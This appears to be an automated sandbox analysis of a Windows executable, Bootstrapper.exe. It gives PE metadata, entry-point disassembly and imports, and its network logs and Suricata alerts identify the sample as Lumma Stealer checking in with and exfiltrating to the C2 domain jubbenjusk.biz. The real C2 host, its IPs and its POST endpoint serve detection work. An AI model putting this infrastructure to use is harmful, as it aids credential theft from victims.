                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x661EAEC3 [Tue Apr 16 17:00:51 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:5942941c298654afc856f3a94fb00cae

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007F39A8C25C64h
                                                    jmp 00007F39A8C2245Dh
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 00000328h
                                                    mov dword ptr [00449598h], eax
                                                    mov dword ptr [00449594h], ecx
                                                    mov dword ptr [00449590h], edx
                                                    mov dword ptr [0044958Ch], ebx
                                                    mov dword ptr [00449588h], esi
                                                    mov dword ptr [00449584h], edi
                                                    mov word ptr [004495B0h], ss
                                                    mov word ptr [004495A4h], cs
                                                    mov word ptr [00449580h], ds
                                                    mov word ptr [0044957Ch], es
                                                    mov word ptr [00449578h], fs
                                                    mov word ptr [00449574h], gs
                                                    pushfd
                                                    pop dword ptr [004495A8h]
                                                    mov eax, dword ptr [ebp+00h]
                                                    mov dword ptr [0044959Ch], eax
                                                    mov eax, dword ptr [ebp+04h]
                                                    mov dword ptr [004495A0h], eax
                                                    lea eax, dword ptr [ebp+08h]
                                                    mov dword ptr [004495ACh], eax
                                                    mov eax, dword ptr [ebp-00000320h]
                                                    mov dword ptr [004494E8h], 00010001h
                                                    mov eax, dword ptr [004495A0h]
                                                    mov dword ptr [0044949Ch], eax
                                                    mov dword ptr [00449490h], C0000409h
                                                    mov dword ptr [00449494h], 00000001h
                                                    mov eax, dword ptr [00448004h]
                                                    mov dword ptr [ebp-00000328h], eax
                                                    mov eax, dword ptr [00448008h]
                                                    mov dword ptr [ebp-00000324h], eax
                                                    call dword ptr [000000A0h]

                                                    Rich Headers

                                                    Programming Language:
                                                    • [C++] VS2008 build 21022
                                                    • [ASM] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2005 build 50727
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x469ec0x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x16fd0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x450000x184.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x4324c0x43400f22a0dcad37ca8e9309869a74a6b887fFalse0.8135999941914498data7.412788530968616IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x450000x228a0x24002d73c0b0ad35a17e0f8ebc7ce6645a6dFalse0.3578559027777778OpenPGP Public Key Version 45.3844357292220675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x480000x67c080x1600184853952973ca2e5903eac6e5f097d3False0.2878196022727273data2.9019450848196295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .joli0xb00000x53e50x4800f9debe3f07be68533bf0295e3d2ba68aFalse0.002224392361111111data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .yoli0xb60000x15a0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .hozuvup0xb70000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .rsrc0xb80000x16fd00x17000a36a7cf1da239b9824903fe447501975False0.44215990149456524data5.080347280737604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_CURSOR0xc8b580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                    RT_CURSOR0xc8ca00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                    RT_ICON0xb89000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.7505330490405118
                                                    RT_ICON0xb97a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.7666967509025271
                                                    RT_ICON0xba0500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.6705069124423964
                                                    RT_ICON0xba7180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.7153179190751445
                                                    RT_ICON0xbac800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.7480290456431535
                                                    RT_ICON0xbd2280x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.8102459016393443
                                                    RT_ICON0xbdbb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.8262411347517731
                                                    RT_ICON0xbe0800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3243603411513859
                                                    RT_ICON0xbef280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.44765342960288806
                                                    RT_ICON0xbf7d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5190092165898618
                                                    RT_ICON0xbfe980x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.536849710982659
                                                    RT_ICON0xc04000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.28822701688555347
                                                    RT_ICON0xc14a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.289344262295082
                                                    RT_ICON0xc1e300x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.34131205673758863
                                                    RT_ICON0xc23000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2785181236673774
                                                    RT_ICON0xc31a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.36462093862815886
                                                    RT_ICON0xc3a500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.3790322580645161
                                                    RT_ICON0xc41180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.36921965317919075
                                                    RT_ICON0xc46800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2590248962655602
                                                    RT_ICON0xc6c280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.274624765478424
                                                    RT_ICON0xc7cd00x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.28647540983606556
                                                    RT_ICON0xc86580x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3262411347517731
                                                    RT_STRING0xc9d180x59adata0.4309623430962343
                                                    RT_STRING0xca2b80xfcdata0.5515873015873016
                                                    RT_STRING0xca3b80x788data0.42012448132780084
                                                    RT_STRING0xcab400x784data0.4287941787941788
                                                    RT_STRING0xcb2c80x726data0.42568306010928963
                                                    RT_STRING0xcb9f00x644data0.4389027431421446
                                                    RT_STRING0xcc0380x6bcdata0.4274941995359629
                                                    RT_STRING0xcc6f80x7f2data0.41297935103244837
                                                    RT_STRING0xccef00x786data0.4221183800623053
                                                    RT_STRING0xcd6780x5cedata0.43943472409152085
                                                    RT_STRING0xcdc480x554data0.45234604105571846
                                                    RT_STRING0xce1a00x60cdata0.4412144702842377
                                                    RT_STRING0xce7b00x81cdata0.41570327552986513
                                                    RT_ACCELERATOR0xc8b380x20data1.15625
                                                    RT_GROUP_CURSOR0xc8c880x14data1.15
                                                    RT_GROUP_CURSOR0xc9b480x14data1.25
                                                    RT_GROUP_ICON0xbe0180x68data0.7115384615384616
                                                    RT_GROUP_ICON0xc8ac00x76data0.6779661016949152
                                                    RT_GROUP_ICON0xc22980x68data0.7115384615384616
                                                    RT_VERSION0xc9b600x1b4data0.5825688073394495

                                                    Imports

                                                    DLLImport
                                                    KERNEL32.dllSearchPathW, SetThreadContext, DeleteTimerQueueEx, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetCurrentThread, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetAtomNameW, GetVolumePathNameA, GetStartupInfoW, RaiseException, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, MoveFileA, AddAtomA, FoldStringA, OpenFileMappingW, GetFileTime, FindFirstVolumeA, FindAtomW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, VirtualAlloc, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetFilePointer, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, CloseHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, GetModuleHandleA

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-12T07:10:18.418393+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710172.67.219.181443TCP
                                                    2025-01-12T07:10:18.931017+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710172.67.219.181443TCP
                                                    2025-01-12T07:10:18.931017+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710172.67.219.181443TCP
                                                    2025-01-12T07:10:19.439977+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711172.67.219.181443TCP
                                                    2025-01-12T07:10:19.934991+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649711172.67.219.181443TCP
                                                    2025-01-12T07:10:19.934991+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711172.67.219.181443TCP
                                                    2025-01-12T07:10:20.812997+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712172.67.219.181443TCP
                                                    2025-01-12T07:10:21.395869+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649712172.67.219.181443TCP
                                                    2025-01-12T07:10:22.083957+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714172.67.219.181443TCP
                                                    2025-01-12T07:10:23.471175+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649721172.67.219.181443TCP
                                                    2025-01-12T07:10:25.479834+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649737172.67.219.181443TCP
                                                    2025-01-12T07:10:26.543060+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649743172.67.219.181443TCP
                                                    2025-01-12T07:10:27.536844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649749172.67.219.181443TCP
                                                    2025-01-12T07:10:27.969739+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649749172.67.219.181443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 12, 2025 07:10:17.897448063 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:17.897494078 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:17.897641897 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:17.923331976 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:17.923347950 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.418221951 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.418392897 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.421354055 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.421365976 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.421782970 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.465092897 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.518021107 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.518021107 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.518235922 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.931106091 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.931354046 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.931508064 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.949238062 CET49710443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.949258089 CET44349710172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.975301027 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.975395918 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:18.975507021 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.975815058 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:18.975833893 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.439739943 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.439976931 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.480380058 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.480454922 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.481492996 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.487337112 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.487361908 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.487546921 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.934998989 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935076952 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935129881 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935178041 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935225010 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.935225964 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.935255051 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935296059 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935364008 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.935380936 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935446978 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.935497999 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.935511112 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.939712048 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.939774036 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.939785004 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.939799070 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.939863920 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:19.939876080 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:19.980637074 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.021764994 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.022100925 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.022185087 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.022313118 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.022355080 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.022387981 CET49711443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.022412062 CET44349711172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.347800970 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.347846031 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.347975016 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.348383904 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.348404884 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.812886000 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.812997103 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.815239906 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.815249920 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.815674067 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:20.817414045 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.817574024 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:20.817624092 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:21.395937920 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:21.396193027 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:21.396332026 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:21.396559954 CET49712443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:21.396583080 CET44349712172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:21.597760916 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:21.597810984 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:21.597924948 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:21.598347902 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:21.598367929 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.083857059 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.083956957 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:22.085709095 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:22.085716963 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.086066961 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.087614059 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:22.087749004 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:22.087790012 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.087846994 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:22.131330967 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.572355032 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.572485924 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:22.572565079 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:22.599601030 CET49714443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:22.599627972 CET44349714172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.002028942 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.002126932 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.002228022 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.002687931 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.002722025 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.471072912 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.471174955 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.472592115 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.472614050 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.472894907 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.474606991 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.474791050 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.474836111 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:23.474911928 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:23.474929094 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:24.105942965 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:24.106036901 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:24.106229067 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:24.106395006 CET49721443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:24.106436968 CET44349721172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.021264076 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.021368027 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.021482944 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.021883965 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.021919966 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.479720116 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.479834080 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.485322952 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.485357046 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.485743046 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.488622904 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.488910913 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.488926888 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.933140039 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.933269024 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:25.933332920 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.933552980 CET49737443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:25.933583975 CET44349737172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.075051069 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.075107098 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.075524092 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.075524092 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.075567961 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.542896986 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.543060064 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.544321060 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.544329882 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.544579029 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:26.545864105 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.545941114 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:26.545948982 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.030633926 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.030769110 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.030879974 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.031160116 CET49743443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.031192064 CET44349743172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.079268932 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.079299927 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.079472065 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.079971075 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.079982042 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.536717892 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.536844015 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.538532019 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.538538933 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.538862944 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.540529966 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.540529966 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.540620089 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.969752073 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.969902992 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.972623110 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.973192930 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.973210096 CET44349749172.67.219.181192.168.2.6
                                                    Jan 12, 2025 07:10:27.973222971 CET49749443192.168.2.6172.67.219.181
                                                    Jan 12, 2025 07:10:27.973228931 CET44349749172.67.219.181192.168.2.6

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 12, 2025 07:10:17.881597996 CET5693453192.168.2.61.1.1.1
                                                    Jan 12, 2025 07:10:17.893162012 CET53569341.1.1.1192.168.2.6

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 12, 2025 07:10:17.881597996 CET192.168.2.61.1.1.10xd2a5Standard query (0)jubbenjusk.bizA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 12, 2025 07:10:17.893162012 CET1.1.1.1192.168.2.60xd2a5No error (0)jubbenjusk.biz172.67.219.181A (IP address)IN (0x0001)false
                                                    Jan 12, 2025 07:10:17.893162012 CET1.1.1.1192.168.2.60xd2a5No error (0)jubbenjusk.biz104.21.38.63A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • jubbenjusk.biz

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.649710172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:18 UTC261OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
